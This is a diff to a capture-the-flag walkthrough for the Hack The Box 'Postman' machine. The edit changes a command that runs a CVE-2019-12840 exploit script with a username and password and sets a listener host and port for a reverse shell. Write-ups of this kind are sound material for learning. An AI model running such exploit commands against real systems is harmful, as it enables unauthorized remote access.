Anymuz/HackTheBox-Walkthroughs/Postman/Postman.md

 ![img](assets/listner.png)

-Once our listener is started, we just need to run the script as instructed with ``python CVE-2019-12840 -u https://[target IP]:10000 -U Matt -P computer2008 -lhost [your IP] -lport 4444`` to gain access.
+Once our listener is started, we just need to run the script as instructed with ``python CVE-2019-12840 -u https://[target IP] -U Matt -P computer2008 -lhost [your IP] -lport 4444`` to gain access.

 ![img](assets/script.png)